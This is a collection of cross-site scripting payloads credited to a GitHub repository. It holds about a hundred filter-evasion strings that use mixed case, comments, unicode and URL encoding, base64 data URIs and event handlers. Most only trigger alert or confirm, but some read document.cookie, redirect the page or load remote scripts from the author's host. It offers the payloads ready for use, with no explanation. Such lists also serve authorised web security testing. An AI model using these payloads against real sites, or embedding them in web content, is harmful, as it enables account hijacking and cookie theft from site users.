#############################################################
#  XSS-Payloads   https://github.com/RenwaX23/XSS-Payloads  #
#             https://twitter.com/RenwaX23                  #
#############################################################

<AuDiO/**/oNLoaDStaRt='(_=/**/confirm/**/(1))'/src><!--renwax23

<mArquee onStart%3D[~[onmouseleave(([[(alert(1))]]))]] ]

<img src="/" =_=" title="onerror='/**/prompt(1)'">

<w="/x="y>"/ondblclick=`<`[confir\u006d``]>z

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

<a/onmousemove=alert(1)//>renwax23

<svg+onload=eval(location.hash.substr(1))>#alert(1)

<button onmousemove="javascript:alert(1)">renwa

<BoDy%0AOnpaGeshoW=%2bwindow.prompt(1)

<a href=[0x0b]renwax23" onfocus=prompt(1) autofocus fragment="

<isindex type=image src=1 onerror=alert(1)>

<script>a=eval;b=alert;a(b(/ 1/.source));</script>'">

<!%27/!"/!\%27/\"/--!><Input/Type=Text%20AutoFocus%20*/;%20OnFocus=(confirm)(1)%20//>

<style><img src="</style><img src=x "><object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>

<embed src=/x//alert(1)><base href="javascript:\

<SPAN " style="display: block; position: absolute; top: 0; left: 0; width: 9999px; height: 9999px; z-index: 9999" foo="></span>renwax23

<article xmlns ="urn:img src=x onerror=xss()//" >renwax23

i\{\<\/\s\t\y\le\>\<\i\m\g\20\o\ne\r\r\o\r\=\'a\le\r\t\(d\oc\u\me\nt\.c\o\o\kie\)\'\s\rc\=\'eeeeeee\'\20\>{

<img / src = \ 'dfdfd \' // onerror = \ 'alert (document.cookie) \ '>

<img/src=q onerror='new Function`al\ert\`OPENBUGBOUNTY\``'>

<Html Onmouseover=(alert)(1) //

<object%20allowscriptaccess=always>%20<param%20name=code%20value=http://renwa.tk/xss.swf>

<script src=http://renwa.tk/d.js></script>

<a href="javascript&colon;alert&lpar;document&period;domain&rpar;">Click Here</a>

<script/src=//google.com/complete/search?client=chrome%26jsonp=alert(1);>

<scr<!--esi-->ipt>aler<!--esi-->t(1)</sc<!--esi-->ript>

&#x003c;img src=1 onerror=confirm(1)&#x003e;

%26%23x003c%3Bimg%20src%3D1%20onerror%3Dalert(1)%26%23x003e%3B%0A

x%22%3E%3Cimg%20src=%22x%22%3E%3C!--%2522%2527--%253E%253CSvg%2520O%256ELoad%253Dconfirm%2528/xss/%2529%253E

<embed src=/x//alert(1)><base href="javascript:\

<x+oncut=y=prompt,y`1`>renwax23

<svG x=">" onload=(co\u006efirm)``>

<script/renwa~~~>;alert(1);</script/X~~~>

<VideO/**/OnerroR=~alert("1")+/SrC>

<video/poster/onerror=prompt(1)>

<sVG/renwa/OnLoaD+="window['confirm']+(1)">

<img x/src=x /onerror="x-\u0063onfirm(1)">

<VidEo/oNLoaDStaRt=confirm(1)+/src>

<video/src=//w3schools.com/tags/movie.mp4%0Aautoplay/onplay=(confirm(1))>

<p/%0Aonmouseover%0A=%0Aconfirm(1)>renwax23

<span/onmouseover=confirm(1)>renwax23

<iframe/name="javascript:confirm(1);"onload="while(1){eval(name);}">

<svg/onload=window.onerror=alert;throw/XSS/;//

<object data='data:text/html;base64,PFNDUklQVD5hbGVydCgnUkVOV0FYMjMnKTs8L1NDUklQVD4=' /src>

<InpuT/**/onfocus=pr\u006fmpt(1)%0Aautofocus>renwa

<img src="x:alert" onerror="eval(src%2b'(1)')">

<img/src=renwax23%0A/**/onerror=eval('al'%2b'ert(1)')>

<img/alt=1 onerror=eval(src) src=x:alert(alt) >

<isindex/**/alt=1+src=renwa:window['alert']/**/(alt)+type=image+onerror=while(true){eval(src)}>

<input type="text" name="foo" value=""autofocus/onfocus=alert(1)//">

<math href="javascript:alert(1)">CLICKME

<var onmouseover="prompt(1)">renwax23</var>

<h1/onmouseover='alert(1)'>renwa

<object data="javascript:alert(1)">

<--'<script>window.confirm(1)</script> --!>

<div onmouseover=prompt("1")>renwa

<img src=x onerror=window.open('data:text/html;base64,PFNDUklQVD5hbGVydCgnUkVOV0FYMjMnKTs8L1NDUklQVD4=');>

<plaintext/onmousemove=prompt(1)>renwa

<marquee/onstart=alert(1)>renwa

<embed src=javascript:alert(1)>

<select autofocus onfocus=alert(1)>

<textarea autofocus onfocus=alert(1)>

<keygen autofocus onfocus=alert(1)>

<div/onmouseover='alert(1)'>renwa

<svg/onload=document.location.href='https://google.com'>

<audio src=x onerror=confirm("1")>

<iframe src="data:text/html;base64,PFNDUklQVD5hbGVydCgnUkVOV0FYMjMnKTs8L1NDUklQVD4="/>

<img%09onerror=alert(1) src=a>

<i onclick=alert(1)>Click here</i>

<img src=<b onerror=alert('renwax23');>

<img src="x:? title=" onerror=alert(1)//">

<img src="x:gif" onerror="eval('al'%2b'ert(/renwax23/)')">

<img src="x:gif" onerror="window['al\u0065rt'] (/'renwax23'/)"></img> 

<a onmouseover%3D"alert(1)">renwax23

<script/%00%00v%00%00>alert(/renwax23/)</script>

<svg/onload=document.location.href='data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4='>

<script>$=1,alert($)</script>

<svg•onload=alert(1)>

<h1/onmouseover='alert(1)'>Renwa

<video onerror=alert(1337) </poster>

<input onfocus=alert(1337) </autofocus>

javascripT://https://google.com%0aalert(1);//https://google.com

/x:1/:///%01javascript:alert(document.cookie)/

" onclick=alert(1)//">click</a> 

" autofocus onfocus=alert(1) "

" onfocus=prompt(1) autofocus fragment="

" onmouseover="confirm(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"

"])},alert(1));(function xss() {//

""});});});alert(1);$('a').each(function(i){$(this).click(function(event){x({y

"}]}';alert(1);{{'

11111';\u006F\u006E\u0065rror=\u0063onfirm; throw'1

\');confirm(1);//

x");$=alert, $(1);//

'|alert(1)|'

'*prompt(1)*'

"; ||confirm('XSS') || "

"-alert(1)-"

\'-alert(1)};{//

"'-alert(1)-'"

\u0027-confirm`1`-\u0027 

'}};alert(1);{{'

// XSS //
